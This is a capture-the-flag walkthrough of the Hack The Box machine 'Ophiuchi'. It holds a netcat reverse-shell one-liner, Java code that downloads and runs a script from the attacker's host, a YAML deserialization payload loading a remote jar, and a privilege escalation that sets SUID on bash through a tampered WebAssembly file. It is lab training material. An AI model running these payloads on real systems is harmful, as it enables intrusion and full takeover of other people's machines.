# Ophiuchi ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FGTbBAg4Oa3LMROOoIpWm%2Fophiuchi.png?alt=media\&token=f35b8573-bdfb-4f92-8010-8310bb92a957) ## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.227 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Sun Jul 3 23:48:53 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.227 Nmap scan report for 10.10.10.227 Host is up (0.056s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy # Nmap done at Sun Jul 3 23:49:08 2022 -- 1 IP address (1 host up) scanned in 14.71 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p80 10.10.10.227 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Sun Jul 3 23:49:41 2022 as: nmap -sCV -p22,8080 -oN targeted 10.10.10.227 Nmap scan report for 10.10.10.227 Host is up (0.046s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA) | 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA) |_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519) 8080/tcp open http Apache Tomcat 9.0.38 |_http-title: Parse YAML Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 3 23:49:51 2022 -- 1 IP address (1 host up) scanned in 10.52 seconds ``` ## Exploitation If we take a look at the website on port *8080*, we'll see a *YAML Parser*. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FvXbHqNhOkB4awoVVA3VQ%2Fimage.png?alt=media\&token=5126c896-1dc8-48ff-8c4a-38f60e593d4c) Doing some research, I found that there is a way to execute command with some *YAML* code. This GitHub [repository ](https://github.com/artsploit/yaml-payload)explains how to do it. Let's clone it. > git clone The idea here is to make a file called `reverse.sh`, which will send us a reverse shell when it is executed. Then, make the server download that file, and then make it execute it. First let's make the `reverse.sh` file. > nano reverse.sh ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 4444 >/tmp/f ``` Then, we'll have to modify the `src/artsploit/AwesomeScriptEngineFactory.java` file. The server will download the `reverse.sh` file, save it in the `/tmp` directory, give it execution permissions, and finally execute it. ```java package artsploit; import javax.script.ScriptEngine; import javax.script.ScriptEngineFactory; import java.io.IOException; import java.util.List; public class AwesomeScriptEngineFactory implements ScriptEngineFactory { public AwesomeScriptEngineFactory() { try { Runtime.getRuntime().exec("curl http://10.10.14.15/reverse.sh -o /dev/shm/reverse.sh"); Runtime.getRuntime().exec("chmod +x /dev/shm/reverse.sh"); Runtime.getRuntime().exec("/dev/shm/reverse.sh"); } catch (IOException e) { e.printStackTrace(); } } @Override public String getEngineName() { return null; } @Override public String getEngineVersion() { return null; } @Override public List getExtensions() { return null; } @Override public List getMimeTypes() { return null; } @Override public List getNames() { return null; } @Override public String getLanguageName() { return null; } @Override public String getLanguageVersion() { return null; } @Override public Object getParameter(String key) { return null; } @Override public String getMethodCallSyntax(String obj, String m, String... args) { return null; } @Override public String getOutputStatement(String toDisplay) { return null; } @Override public String getProgram(String... statements) { return null; } @Override public ScriptEngine getScriptEngine() { return null; } } ``` Now, we'll have to compile it. > javac src/artsploit/AwesomeScriptEngineFactory.java > > jar -cvf yaml-payload.jar -C src/ . Now, let's set a simple HTTP server where the `reverse.sh` and the `src/` directory are. > python -m http.server 80 And a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Finally, if we submit the following *YAML* code through the website, we should get a reverse shell as the `www-data` user. Maybe you'll have to submit the code twice to make it work. ``` !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.15/yaml-payload.jar"] ]] ] ``` ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FdfGyOFMf0rUFBD0QgGFu%2Fimage.png?alt=media\&token=d0d446e5-e92c-4085-bd8c-a26612e96d7c) ``` listening on [any] 4444 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 52796 /bin/sh: 0: can't access tty; job control turned off $ whoami tomcat ``` ## Privilege Escalation First, let's set an interactive *TTY* shell. > script /dev/null -c /bin/bash Then I press `Ctrl+Z` and execute the following command on my local machine: > stty raw -echo; fg > > reset > > Terminal type? xterm Next, I export a few variables: > export TERM=xterm > > export SHELL=bash Finally, I run the following command in our local machine: > stty size ``` 51 236 ``` And set the proper dimensions in the victim machine: > stty rows 51 columns 236 Let's see the system users. > grep sh /etc/passwd ``` root:x:0:0:root:/root:/bin/bash sshd:x:111:65534::/run/sshd:/usr/sbin/nologin admin:x:1000:1000:,,,:/home/admin:/bin/bash ``` As we saw in the *nmap* report, there is a Tomcat server running on the machine. We could try to find the `tomcat-users.xml` file. > find / -name tomcat-users.xml 2>/dev/null ``` /opt/tomcat/conf/tomcat-users.xml ``` If we see it's content, we'll see some credentials for the `admin` user. > cat /opt/tomcat/conf/tomcat-users.xml ```xml ``` Let's try to become the `admin` user with the `whythereisalimit` password. Then, we'll be able to grab the user flag. > su admin ``` Password: whythereisalimit admin@ophiuchi:/$ whoami admin admin@ophiuchi:/$ cat /home/admin/user.txt 505fba479878a280e123e7bdbe94c902 ``` If we check for sudo privileges, we'll see that we can execute a `go` script as the *root* user. > sudo -l ``` Matching Defaults entries for admin on ophiuchi: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User admin may run the following commands on ophiuchi: (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go ``` If we execute it, we'll get a bunch of errors. > sudo /usr/bin/go run /opt/wasm-functions/index.go ``` panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/wasmerio/wasmer-go/wasmer.NewInstanceWithImports.func1(0x0, 0x0, 0xc000040c90, 0x5d1200, 0x200000003) /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:94 +0x201 github.com/wasmerio/wasmer-go/wasmer.newInstanceWithImports(0xc00008c020, 0xc000040d48, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc000040d70) /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:137 +0x1d3 github.com/wasmerio/wasmer-go/wasmer.NewInstanceWithImports(0x0, 0x0, 0x0, 0xc00008c020, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4e6180, ...) /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:87 +0xa6 github.com/wasmerio/wasmer-go/wasmer.NewInstance(0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4e6180, 0x1) /root/go/src/github.com/wasmerio/wasmer-go/wasmer/instance.go:82 +0xc9 main.main() /opt/wasm-functions/index.go:14 +0x6d exit status 2 ``` Let's take a look at it. > cat /opt/wasm-functions/index.go ```go package main import ( "fmt" wasm "github.com/wasmerio/wasmer-go/wasmer" "os/exec" "log" ) func main() { bytes, _ := wasm.ReadBytes("main.wasm") instance, _ := wasm.NewInstance(bytes) defer instance.Close() init := instance.Exports["info"] result,_ := init() f := result.String() if (f != "1") { fmt.Println("Not ready to deploy") } else { fmt.Println("Ready to deploy") out, err := exec.Command("/bin/sh", "deploy.sh").Output() if err != nil { log.Fatal(err) } fmt.Println(string(out)) } } ``` The file is trying to read a `main.wasm` file. Let's find it. > find / -name main.wasm 2>/dev/null ``` /opt/wasm-functions/main.wasm /opt/wasm-functions/backup/main.wasm ``` If we go to the `/opt/wasm-functions/` directory and execute the script again, we won't see any errors because now the script can find the `main.wasm` file in the current directory. > cd /opt/wasm-functions/ > > sudo /usr/bin/go run /opt/wasm-functions/index.go ``` Not ready to deploy ``` Let's understand a bit the functionality of the script. Basically, it is reading the content of the `main.wasm` file, which is a binary, so it is not readable. Then, it is checking if the `f` variable is equal to *1*. If it is equal to *1*, then it will execute a file called `deploy.sh`, if not, it will show the message `Not ready to deploy`. The idea is to modify the `main.wasm` file so the f variable is equal to *1*, and then it will execute a file called deploy.sh made by us, which will give the `/bin/bash` the *SUID* permission. Let's go to the `/tmp` directory, and make that file. > nano /tmp/deploy.sh > > chmod +x /tmp/deploy.sh ``` #!/bin/bash chmod u+s /bin/bash ``` Now, let's transfer the `main.wasm` file to our local machine. > python3 -m http.server 8081 On our local machine. > wget Now, we'll have to convert the `.wasm` file to a `.wat` file, so it is readable. We can do it with the following GitHub repository. > git clone > > cd wabt > > git submodule update --init Now, let's compile it. > mkdir build > > cd build > > cmake .. > > cmake --build . Now, let's convert the `main.wasm` file to `main.wat` file. > ./wasm2wat main.wasm > main.wat > > cat main.wat ``` (module (type (;0;) (func (result i32))) (func $info (type 0) (result i32) i32.const 0) (table (;0;) 1 1 funcref) (memory (;0;) 16) (global (;0;) (mut i32) (i32.const 1048576)) (global (;1;) i32 (i32.const 1048576)) (global (;2;) i32 (i32.const 1048576)) (export "memory" (memory 0)) (export "info" (func $info)) (export "__data_end" (global 1)) (export "__heap_base" (global 2))) ``` There is a constant which is equal to *0*, maybe if we change it to *1* the `f` variable will be equal to *1*, and the `deploy.sh` script will be executed. Let's change the `main.wat` file. > nano main.wat ``` (module (type (;0;) (func (result i32))) (func $info (type 0) (result i32) i32.const 1) (table (;0;) 1 1 funcref) (memory (;0;) 16) (global (;0;) (mut i32) (i32.const 1048576)) (global (;1;) i32 (i32.const 1048576)) (global (;2;) i32 (i32.const 1048576)) (export "memory" (memory 0)) (export "info" (func $info)) (export "__data_end" (global 1)) (export "__heap_base" (global 2))) ``` Now, we'll have to convert the `.wat` file to `.wasm`. > rm main.wasm > > ./wat2wasm main.wat > main.wasm And transfer it to the victim machine. Let's set a simple HTTP server with python. > python -m http.server 80 And download it from the `/tmp` directory of the victim machine. > cd /tmp > > wget If now we execute the script, we'll see the `Ready to deploy` message. > sudo /usr/bin/go run /opt/wasm-functions/index.go ``` Ready to deploy ``` Now, the `/bin/bash` binary hash *SUID* privileges. > ls -l /bin/bash ``` -rwsr-xr-x 1 root root 1183448 Feb 25 2020 /bin/bash ``` And finally, all we have to do is execute the *bash* binary with root permissions, and reap the harvest and take the root flag. > bash -p ``` bash-5.0# whoami root bash-5.0# cat /root/root.txt 479eea917b6888cf319d635e702dde6d ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/ophiuchi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.